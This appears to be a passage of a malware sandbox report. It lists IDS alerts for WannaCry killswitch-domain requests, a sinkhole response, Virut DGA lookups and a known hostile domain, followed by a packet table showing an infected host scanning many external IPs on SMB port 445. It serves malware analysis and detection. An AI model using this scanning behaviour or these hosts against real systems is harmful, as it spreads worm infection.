2025-01-15T16:57:29.292333+0100	2024299	ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 2	1	192.168.2.8	49711	104.16.167.228	80	TCP
2025-01-15T16:57:29.292333+0100	2024301	ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 4	1	192.168.2.8	49711	104.16.167.228	80	TCP
2025-01-15T16:57:29.292333+0100	2024302	ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 5	1	192.168.2.8	49711	104.16.167.228	80	TCP
2025-01-15T16:57:29.298854+0100	2031515	ET MALWARE Known Sinkhole Response Kryptos Logic	3	104.16.167.228	80	192.168.2.8	49711	TCP
2025-01-15T16:58:17.011779+0100	2012730	ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup	1	192.168.2.8	61724	1.1.1.1	53	UDP
2025-01-15T16:58:25.678068+0100	2811577	ETPRO MALWARE Possible Virut DGA NXDOMAIN Responses (com)	1	1.1.1.1	53	192.168.2.8	53292	UDP
2025-01-15T16:58:48.953187+0100	2811577	ETPRO MALWARE Possible Virut DGA NXDOMAIN Responses (com)	1	1.1.1.1	53	192.168.2.8	61145	UDP
2025-01-15T16:59:06.237534+0100	2811577	ETPRO MALWARE Possible Virut DGA NXDOMAIN Responses (com)	1	1.1.1.1	53	192.168.2.8	61597	UDP
2025-01-15T16:59:08.402519+0100	2012730	ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup	1	192.168.2.8	63409	1.1.1.1	53	UDP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 16:57:05.948460102 CET	49673	443	192.168.2.8	23.206.229.226
Jan 15, 2025 16:57:06.307770967 CET	49672	443	192.168.2.8	23.206.229.226
Jan 15, 2025 16:57:10.885916948 CET	49676	443	192.168.2.8	52.182.143.211
Jan 15, 2025 16:57:13.510910988 CET	49677	80	192.168.2.8	192.229.211.108
Jan 15, 2025 16:57:15.559555054 CET	49673	443	192.168.2.8	23.206.229.226
Jan 15, 2025 16:57:15.597143888 CET	49704	80	192.168.2.8	104.16.166.228
Jan 15, 2025 16:57:15.602000952 CET	80	49704	104.16.166.228	192.168.2.8
Jan 15, 2025 16:57:15.602114916 CET	49704	80	192.168.2.8	104.16.166.228
Jan 15, 2025 16:57:15.602371931 CET	49704	80	192.168.2.8	104.16.166.228
Jan 15, 2025 16:57:15.607300043 CET	80	49704	104.16.166.228	192.168.2.8
Jan 15, 2025 16:57:15.917129993 CET	49672	443	192.168.2.8	23.206.229.226
Jan 15, 2025 16:57:16.079792023 CET	80	49704	104.16.166.228	192.168.2.8
Jan 15, 2025 16:57:16.080005884 CET	49704	80	192.168.2.8	104.16.166.228
Jan 15, 2025 16:57:16.080005884 CET	49704	80	192.168.2.8	104.16.166.228
Jan 15, 2025 16:57:16.080806017 CET	80	49704	104.16.166.228	192.168.2.8
Jan 15, 2025 16:57:16.081187963 CET	49704	80	192.168.2.8	104.16.166.228
Jan 15, 2025 16:57:16.086117029 CET	80	49704	104.16.166.228	192.168.2.8
Jan 15, 2025 16:57:17.643824100 CET	443	49703	23.206.229.226	192.168.2.8
Jan 15, 2025 16:57:17.643917084 CET	49703	443	192.168.2.8	23.206.229.226
Jan 15, 2025 16:57:25.575793982 CET	49707	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:57:25.580702066 CET	80	49707	88.198.69.43	192.168.2.8
Jan 15, 2025 16:57:25.580775023 CET	49707	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:57:25.580888987 CET	49707	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:57:25.585639954 CET	80	49707	88.198.69.43	192.168.2.8
Jan 15, 2025 16:57:25.585820913 CET	49707	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:57:25.590574980 CET	80	49707	88.198.69.43	192.168.2.8
Jan 15, 2025 16:57:25.658787966 CET	49708	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:57:25.663678885 CET	80	49708	88.198.69.43	192.168.2.8
Jan 15, 2025 16:57:25.663747072 CET	49708	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:57:25.663785934 CET	49708	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:57:25.668540001 CET	80	49708	88.198.69.43	192.168.2.8
Jan 15, 2025 16:57:25.668581009 CET	49708	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:57:25.673368931 CET	80	49708	88.198.69.43	192.168.2.8
Jan 15, 2025 16:57:28.716026068 CET	49710	80	192.168.2.8	104.16.167.228
Jan 15, 2025 16:57:28.720879078 CET	80	49710	104.16.167.228	192.168.2.8
Jan 15, 2025 16:57:28.724864006 CET	49710	80	192.168.2.8	104.16.167.228
Jan 15, 2025 16:57:28.726372004 CET	49710	80	192.168.2.8	104.16.167.228
Jan 15, 2025 16:57:28.731149912 CET	80	49710	104.16.167.228	192.168.2.8
Jan 15, 2025 16:57:28.789351940 CET	49711	80	192.168.2.8	104.16.167.228
Jan 15, 2025 16:57:28.794138908 CET	80	49711	104.16.167.228	192.168.2.8
Jan 15, 2025 16:57:28.794229031 CET	49711	80	192.168.2.8	104.16.167.228
Jan 15, 2025 16:57:28.794615030 CET	49711	80	192.168.2.8	104.16.167.228
Jan 15, 2025 16:57:28.799340010 CET	80	49711	104.16.167.228	192.168.2.8
Jan 15, 2025 16:57:29.208458900 CET	80	49710	104.16.167.228	192.168.2.8
Jan 15, 2025 16:57:29.208532095 CET	49710	80	192.168.2.8	104.16.167.228
Jan 15, 2025 16:57:29.208648920 CET	49710	80	192.168.2.8	104.16.167.228
Jan 15, 2025 16:57:29.210202932 CET	80	49710	104.16.167.228	192.168.2.8
Jan 15, 2025 16:57:29.210249901 CET	49710	80	192.168.2.8	104.16.167.228
Jan 15, 2025 16:57:29.213363886 CET	80	49710	104.16.167.228	192.168.2.8
Jan 15, 2025 16:57:29.292155027 CET	80	49711	104.16.167.228	192.168.2.8
Jan 15, 2025 16:57:29.292316914 CET	80	49711	104.16.167.228	192.168.2.8
Jan 15, 2025 16:57:29.292332888 CET	49711	80	192.168.2.8	104.16.167.228
Jan 15, 2025 16:57:29.292365074 CET	49711	80	192.168.2.8	104.16.167.228
Jan 15, 2025 16:57:29.294111013 CET	49711	80	192.168.2.8	104.16.167.228
Jan 15, 2025 16:57:29.298854113 CET	80	49711	104.16.167.228	192.168.2.8
Jan 15, 2025 16:57:29.328969002 CET	49712	445	192.168.2.8	203.228.45.4
Jan 15, 2025 16:57:29.333750010 CET	445	49712	203.228.45.4	192.168.2.8
Jan 15, 2025 16:57:29.333841085 CET	49712	445	192.168.2.8	203.228.45.4
Jan 15, 2025 16:57:29.334635019 CET	49712	445	192.168.2.8	203.228.45.4
Jan 15, 2025 16:57:29.334827900 CET	49713	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:29.339432955 CET	445	49712	203.228.45.4	192.168.2.8
Jan 15, 2025 16:57:29.339482069 CET	49712	445	192.168.2.8	203.228.45.4
Jan 15, 2025 16:57:29.339592934 CET	445	49713	203.228.45.1	192.168.2.8
Jan 15, 2025 16:57:29.339683056 CET	49713	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:29.339809895 CET	49713	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:29.344729900 CET	445	49713	203.228.45.1	192.168.2.8
Jan 15, 2025 16:57:29.344791889 CET	49713	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:29.358371973 CET	49714	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:29.363142014 CET	445	49714	203.228.45.1	192.168.2.8
Jan 15, 2025 16:57:29.363281012 CET	49714	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:29.363368988 CET	49714	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:29.368129969 CET	445	49714	203.228.45.1	192.168.2.8
Jan 15, 2025 16:57:31.262269974 CET	49738	445	192.168.2.8	209.135.205.16
Jan 15, 2025 16:57:31.267087936 CET	445	49738	209.135.205.16	192.168.2.8
Jan 15, 2025 16:57:31.267147064 CET	49738	445	192.168.2.8	209.135.205.16
Jan 15, 2025 16:57:31.267239094 CET	49738	445	192.168.2.8	209.135.205.16
Jan 15, 2025 16:57:31.267482042 CET	49739	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:31.272090912 CET	445	49738	209.135.205.16	192.168.2.8
Jan 15, 2025 16:57:31.272134066 CET	49738	445	192.168.2.8	209.135.205.16
Jan 15, 2025 16:57:31.272723913 CET	445	49739	209.135.205.1	192.168.2.8
Jan 15, 2025 16:57:31.272770882 CET	49739	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:31.272849083 CET	49739	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:31.273914099 CET	49740	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:31.277851105 CET	445	49739	209.135.205.1	192.168.2.8
Jan 15, 2025 16:57:31.277906895 CET	49739	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:31.279134035 CET	445	49740	209.135.205.1	192.168.2.8
Jan 15, 2025 16:57:31.279198885 CET	49740	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:31.279248953 CET	49740	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:31.284250975 CET	445	49740	209.135.205.1	192.168.2.8
Jan 15, 2025 16:57:33.278446913 CET	49764	445	192.168.2.8	198.232.135.223
Jan 15, 2025 16:57:33.283343077 CET	445	49764	198.232.135.223	192.168.2.8
Jan 15, 2025 16:57:33.283411980 CET	49764	445	192.168.2.8	198.232.135.223
Jan 15, 2025 16:57:33.283504009 CET	49764	445	192.168.2.8	198.232.135.223
Jan 15, 2025 16:57:33.283668041 CET	49765	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:33.288306952 CET	445	49764	198.232.135.223	192.168.2.8
Jan 15, 2025 16:57:33.288400888 CET	49764	445	192.168.2.8	198.232.135.223
Jan 15, 2025 16:57:33.288667917 CET	445	49765	198.232.135.1	192.168.2.8
Jan 15, 2025 16:57:33.288723946 CET	49765	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:33.288790941 CET	49765	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:33.289866924 CET	49766	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:33.293806076 CET	445	49765	198.232.135.1	192.168.2.8
Jan 15, 2025 16:57:33.293859005 CET	49765	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:33.294673920 CET	445	49766	198.232.135.1	192.168.2.8
Jan 15, 2025 16:57:33.294737101 CET	49766	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:33.294802904 CET	49766	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:33.299581051 CET	445	49766	198.232.135.1	192.168.2.8
Jan 15, 2025 16:57:35.305922031 CET	49787	445	192.168.2.8	112.84.177.245
Jan 15, 2025 16:57:35.310950994 CET	445	49787	112.84.177.245	192.168.2.8
Jan 15, 2025 16:57:35.312793016 CET	49787	445	192.168.2.8	112.84.177.245
Jan 15, 2025 16:57:35.314167976 CET	49787	445	192.168.2.8	112.84.177.245
Jan 15, 2025 16:57:35.314409018 CET	49788	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:35.318979979 CET	445	49787	112.84.177.245	192.168.2.8
Jan 15, 2025 16:57:35.319217920 CET	49787	445	192.168.2.8	112.84.177.245
Jan 15, 2025 16:57:35.319235086 CET	445	49788	112.84.177.1	192.168.2.8
Jan 15, 2025 16:57:35.319372892 CET	49788	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:35.324702978 CET	49788	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:35.329513073 CET	445	49788	112.84.177.1	192.168.2.8
Jan 15, 2025 16:57:35.329567909 CET	49788	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:35.390547991 CET	49789	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:35.395572901 CET	445	49789	112.84.177.1	192.168.2.8
Jan 15, 2025 16:57:35.395725012 CET	49789	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:35.407634020 CET	49789	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:35.412414074 CET	445	49789	112.84.177.1	192.168.2.8
Jan 15, 2025 16:57:37.341068029 CET	49812	445	192.168.2.8	201.202.46.145
Jan 15, 2025 16:57:37.346199036 CET	445	49812	201.202.46.145	192.168.2.8
Jan 15, 2025 16:57:37.346307039 CET	49812	445	192.168.2.8	201.202.46.145
Jan 15, 2025 16:57:37.346358061 CET	49812	445	192.168.2.8	201.202.46.145
Jan 15, 2025 16:57:37.346543074 CET	49813	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:57:37.351360083 CET	445	49813	201.202.46.1	192.168.2.8
Jan 15, 2025 16:57:37.351389885 CET	445	49812	201.202.46.145	192.168.2.8
Jan 15, 2025 16:57:37.351417065 CET	49813	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:57:37.351440907 CET	49812	445	192.168.2.8	201.202.46.145
Jan 15, 2025 16:57:37.351511955 CET	49813	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:57:37.352432013 CET	49814	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:57:37.356832981 CET	445	49813	201.202.46.1	192.168.2.8
Jan 15, 2025 16:57:37.356998920 CET	49813	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:57:37.359389067 CET	445	49814	201.202.46.1	192.168.2.8
Jan 15, 2025 16:57:37.359457970 CET	49814	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:57:37.359520912 CET	49814	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:57:37.364280939 CET	445	49814	201.202.46.1	192.168.2.8
Jan 15, 2025 16:57:39.360675097 CET	49837	445	192.168.2.8	69.111.126.153
Jan 15, 2025 16:57:39.365678072 CET	445	49837	69.111.126.153	192.168.2.8
Jan 15, 2025 16:57:39.365756035 CET	49837	445	192.168.2.8	69.111.126.153
Jan 15, 2025 16:57:39.365827084 CET	49837	445	192.168.2.8	69.111.126.153
Jan 15, 2025 16:57:39.366070032 CET	49838	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:57:39.371361017 CET	445	49837	69.111.126.153	192.168.2.8
Jan 15, 2025 16:57:39.371386051 CET	445	49838	69.111.126.1	192.168.2.8
Jan 15, 2025 16:57:39.371426105 CET	49837	445	192.168.2.8	69.111.126.153
Jan 15, 2025 16:57:39.371474981 CET	49838	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:57:39.386249065 CET	49838	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:57:39.387459040 CET	49839	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:57:39.391181946 CET	445	49838	69.111.126.1	192.168.2.8
Jan 15, 2025 16:57:39.391269922 CET	49838	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:57:39.392381907 CET	445	49839	69.111.126.1	192.168.2.8
Jan 15, 2025 16:57:39.392466068 CET	49839	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:57:39.394581079 CET	49839	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:57:39.399766922 CET	445	49839	69.111.126.1	192.168.2.8
Jan 15, 2025 16:57:41.370906115 CET	49862	445	192.168.2.8	200.214.167.67
Jan 15, 2025 16:57:41.375955105 CET	445	49862	200.214.167.67	192.168.2.8
Jan 15, 2025 16:57:41.376163960 CET	49862	445	192.168.2.8	200.214.167.67
Jan 15, 2025 16:57:41.376255035 CET	49862	445	192.168.2.8	200.214.167.67
Jan 15, 2025 16:57:41.376409054 CET	49863	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:57:41.381201982 CET	445	49862	200.214.167.67	192.168.2.8
Jan 15, 2025 16:57:41.381278038 CET	49862	445	192.168.2.8	200.214.167.67
Jan 15, 2025 16:57:41.381283045 CET	445	49863	200.214.167.1	192.168.2.8
Jan 15, 2025 16:57:41.381330967 CET	49863	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:57:41.381387949 CET	49863	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:57:41.381617069 CET	49864	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:57:41.386214972 CET	445	49863	200.214.167.1	192.168.2.8
Jan 15, 2025 16:57:41.386269093 CET	49863	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:57:41.386488914 CET	445	49864	200.214.167.1	192.168.2.8
Jan 15, 2025 16:57:41.386544943 CET	49864	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:57:41.386576891 CET	49864	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:57:41.391382933 CET	445	49864	200.214.167.1	192.168.2.8
Jan 15, 2025 16:57:43.386440992 CET	49886	445	192.168.2.8	84.147.160.132
Jan 15, 2025 16:57:43.391659975 CET	445	49886	84.147.160.132	192.168.2.8
Jan 15, 2025 16:57:43.391779900 CET	49886	445	192.168.2.8	84.147.160.132
Jan 15, 2025 16:57:43.391841888 CET	49886	445	192.168.2.8	84.147.160.132
Jan 15, 2025 16:57:43.391932964 CET	49887	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:57:43.396877050 CET	445	49886	84.147.160.132	192.168.2.8
Jan 15, 2025 16:57:43.396912098 CET	445	49887	84.147.160.1	192.168.2.8
Jan 15, 2025 16:57:43.397120953 CET	49887	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:57:43.397120953 CET	49887	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:57:43.397129059 CET	49886	445	192.168.2.8	84.147.160.132
Jan 15, 2025 16:57:43.397224903 CET	49888	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:57:43.402173042 CET	445	49888	84.147.160.1	192.168.2.8
Jan 15, 2025 16:57:43.402201891 CET	445	49887	84.147.160.1	192.168.2.8
Jan 15, 2025 16:57:43.402226925 CET	49888	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:57:43.402250051 CET	49887	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:57:43.402271032 CET	49888	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:57:43.407119989 CET	445	49888	84.147.160.1	192.168.2.8
Jan 15, 2025 16:57:45.402041912 CET	49911	445	192.168.2.8	75.165.172.241
Jan 15, 2025 16:57:45.407025099 CET	445	49911	75.165.172.241	192.168.2.8
Jan 15, 2025 16:57:45.407114983 CET	49911	445	192.168.2.8	75.165.172.241
Jan 15, 2025 16:57:45.407176018 CET	49911	445	192.168.2.8	75.165.172.241
Jan 15, 2025 16:57:45.407282114 CET	49912	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:57:45.412139893 CET	445	49911	75.165.172.241	192.168.2.8
Jan 15, 2025 16:57:45.412156105 CET	445	49912	75.165.172.1	192.168.2.8
Jan 15, 2025 16:57:45.412208080 CET	49911	445	192.168.2.8	75.165.172.241
Jan 15, 2025 16:57:45.412226915 CET	49912	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:57:45.412307978 CET	49912	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:57:45.412509918 CET	49913	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:57:45.417227983 CET	445	49912	75.165.172.1	192.168.2.8
Jan 15, 2025 16:57:45.417283058 CET	49912	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:57:45.417309046 CET	445	49913	75.165.172.1	192.168.2.8
Jan 15, 2025 16:57:45.417357922 CET	49913	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:57:45.417392015 CET	49913	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:57:45.422197104 CET	445	49913	75.165.172.1	192.168.2.8
Jan 15, 2025 16:57:47.006555080 CET	80	49707	88.198.69.43	192.168.2.8
Jan 15, 2025 16:57:47.006618023 CET	49707	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:57:47.006649971 CET	49707	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:57:47.011409998 CET	80	49707	88.198.69.43	192.168.2.8
Jan 15, 2025 16:57:47.086174011 CET	80	49708	88.198.69.43	192.168.2.8
Jan 15, 2025 16:57:47.086246967 CET	49708	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:57:47.086272955 CET	49708	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:57:47.091080904 CET	80	49708	88.198.69.43	192.168.2.8
Jan 15, 2025 16:57:47.418009043 CET	49936	445	192.168.2.8	8.188.251.4
Jan 15, 2025 16:57:47.422929049 CET	445	49936	8.188.251.4	192.168.2.8
Jan 15, 2025 16:57:47.423037052 CET	49936	445	192.168.2.8	8.188.251.4
Jan 15, 2025 16:57:47.423094988 CET	49936	445	192.168.2.8	8.188.251.4
Jan 15, 2025 16:57:47.425647020 CET	49937	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:57:47.428179026 CET	445	49936	8.188.251.4	192.168.2.8
Jan 15, 2025 16:57:47.428250074 CET	49936	445	192.168.2.8	8.188.251.4
Jan 15, 2025 16:57:47.430552959 CET	445	49937	8.188.251.1	192.168.2.8
Jan 15, 2025 16:57:47.430748940 CET	49937	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:57:47.430748940 CET	49937	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:57:47.430826902 CET	49938	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:57:47.435612917 CET	445	49937	8.188.251.1	192.168.2.8
Jan 15, 2025 16:57:47.435623884 CET	445	49938	8.188.251.1	192.168.2.8
Jan 15, 2025 16:57:47.435700893 CET	49938	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:57:47.435715914 CET	49938	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:57:47.435966015 CET	445	49937	8.188.251.1	192.168.2.8
Jan 15, 2025 16:57:47.436033964 CET	49937	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:57:47.441288948 CET	445	49938	8.188.251.1	192.168.2.8
Jan 15, 2025 16:57:49.433335066 CET	49960	445	192.168.2.8	46.252.194.170
Jan 15, 2025 16:57:49.438294888 CET	445	49960	46.252.194.170	192.168.2.8
Jan 15, 2025 16:57:49.438416958 CET	49960	445	192.168.2.8	46.252.194.170
Jan 15, 2025 16:57:49.438561916 CET	49960	445	192.168.2.8	46.252.194.170
Jan 15, 2025 16:57:49.438729048 CET	49961	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:57:49.443409920 CET	445	49960	46.252.194.170	192.168.2.8
Jan 15, 2025 16:57:49.443514109 CET	49960	445	192.168.2.8	46.252.194.170
Jan 15, 2025 16:57:49.443643093 CET	445	49961	46.252.194.1	192.168.2.8
Jan 15, 2025 16:57:49.443700075 CET	49961	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:57:49.443767071 CET	49961	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:57:49.444031954 CET	49962	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:57:49.448666096 CET	445	49961	46.252.194.1	192.168.2.8
Jan 15, 2025 16:57:49.448750019 CET	49961	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:57:49.448795080 CET	445	49962	46.252.194.1	192.168.2.8
Jan 15, 2025 16:57:49.448859930 CET	49962	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:57:49.448894024 CET	49962	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:57:49.453653097 CET	445	49962	46.252.194.1	192.168.2.8
Jan 15, 2025 16:57:50.730693102 CET	445	49714	203.228.45.1	192.168.2.8
Jan 15, 2025 16:57:50.730798960 CET	49714	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:50.730894089 CET	49714	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:50.730923891 CET	49714	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:50.735872984 CET	445	49714	203.228.45.1	192.168.2.8
Jan 15, 2025 16:57:50.735905886 CET	445	49714	203.228.45.1	192.168.2.8
Jan 15, 2025 16:57:51.449213028 CET	49984	445	192.168.2.8	40.249.82.97
Jan 15, 2025 16:57:51.454988003 CET	445	49984	40.249.82.97	192.168.2.8
Jan 15, 2025 16:57:51.455060005 CET	49984	445	192.168.2.8	40.249.82.97
Jan 15, 2025 16:57:51.455147028 CET	49984	445	192.168.2.8	40.249.82.97
Jan 15, 2025 16:57:51.455342054 CET	49985	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:57:51.460170984 CET	445	49984	40.249.82.97	192.168.2.8
Jan 15, 2025 16:57:51.460246086 CET	49984	445	192.168.2.8	40.249.82.97
Jan 15, 2025 16:57:51.460268974 CET	445	49985	40.249.82.1	192.168.2.8
Jan 15, 2025 16:57:51.460349083 CET	49985	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:57:51.460434914 CET	49985	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:57:51.460725069 CET	49986	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:57:51.465428114 CET	445	49985	40.249.82.1	192.168.2.8
Jan 15, 2025 16:57:51.465493917 CET	49985	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:57:51.465547085 CET	445	49986	40.249.82.1	192.168.2.8
Jan 15, 2025 16:57:51.465606928 CET	49986	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:57:51.465656996 CET	49986	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:57:51.470418930 CET	445	49986	40.249.82.1	192.168.2.8
Jan 15, 2025 16:57:52.646233082 CET	445	49740	209.135.205.1	192.168.2.8
Jan 15, 2025 16:57:52.647345066 CET	49740	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:52.647345066 CET	49740	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:52.647459984 CET	49740	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:52.652440071 CET	445	49740	209.135.205.1	192.168.2.8
Jan 15, 2025 16:57:52.652451038 CET	445	49740	209.135.205.1	192.168.2.8
Jan 15, 2025 16:57:53.465209007 CET	50009	445	192.168.2.8	9.166.247.19
Jan 15, 2025 16:57:53.470076084 CET	445	50009	9.166.247.19	192.168.2.8
Jan 15, 2025 16:57:53.470148087 CET	50009	445	192.168.2.8	9.166.247.19
Jan 15, 2025 16:57:53.470240116 CET	50009	445	192.168.2.8	9.166.247.19
Jan 15, 2025 16:57:53.470388889 CET	50010	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:57:53.476186037 CET	445	50010	9.166.247.1	192.168.2.8
Jan 15, 2025 16:57:53.476278067 CET	50010	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:57:53.476424932 CET	50010	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:57:53.476475000 CET	445	50009	9.166.247.19	192.168.2.8
Jan 15, 2025 16:57:53.476530075 CET	50009	445	192.168.2.8	9.166.247.19
Jan 15, 2025 16:57:53.476749897 CET	50011	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:57:53.481504917 CET	445	50010	9.166.247.1	192.168.2.8
Jan 15, 2025 16:57:53.481594086 CET	50010	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:57:53.481642008 CET	445	50011	9.166.247.1	192.168.2.8
Jan 15, 2025 16:57:53.481725931 CET	50011	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:57:53.481770992 CET	50011	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:57:53.487029076 CET	445	50011	9.166.247.1	192.168.2.8
Jan 15, 2025 16:57:53.746059895 CET	50015	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:53.751154900 CET	445	50015	203.228.45.1	192.168.2.8
Jan 15, 2025 16:57:53.751276016 CET	50015	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:53.751322985 CET	50015	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:57:53.756187916 CET	445	50015	203.228.45.1	192.168.2.8
Jan 15, 2025 16:57:54.680309057 CET	445	49766	198.232.135.1	192.168.2.8
Jan 15, 2025 16:57:54.680388927 CET	49766	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:54.680480957 CET	49766	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:54.680574894 CET	49766	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:54.686465025 CET	445	49766	198.232.135.1	192.168.2.8
Jan 15, 2025 16:57:54.686480045 CET	445	49766	198.232.135.1	192.168.2.8
Jan 15, 2025 16:57:55.480473995 CET	50016	445	192.168.2.8	38.185.147.195
Jan 15, 2025 16:57:55.486910105 CET	445	50016	38.185.147.195	192.168.2.8
Jan 15, 2025 16:57:55.486989021 CET	50016	445	192.168.2.8	38.185.147.195
Jan 15, 2025 16:57:55.487086058 CET	50016	445	192.168.2.8	38.185.147.195
Jan 15, 2025 16:57:55.487288952 CET	50017	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:57:55.492927074 CET	445	50017	38.185.147.1	192.168.2.8
Jan 15, 2025 16:57:55.493017912 CET	50017	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:57:55.493097067 CET	50017	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:57:55.493490934 CET	50018	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:57:55.493969917 CET	445	50016	38.185.147.195	192.168.2.8
Jan 15, 2025 16:57:55.494026899 CET	50016	445	192.168.2.8	38.185.147.195
Jan 15, 2025 16:57:55.499133110 CET	445	50018	38.185.147.1	192.168.2.8
Jan 15, 2025 16:57:55.499198914 CET	50018	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:57:55.499264956 CET	50018	445	192.168.2.8	38.185.147.1
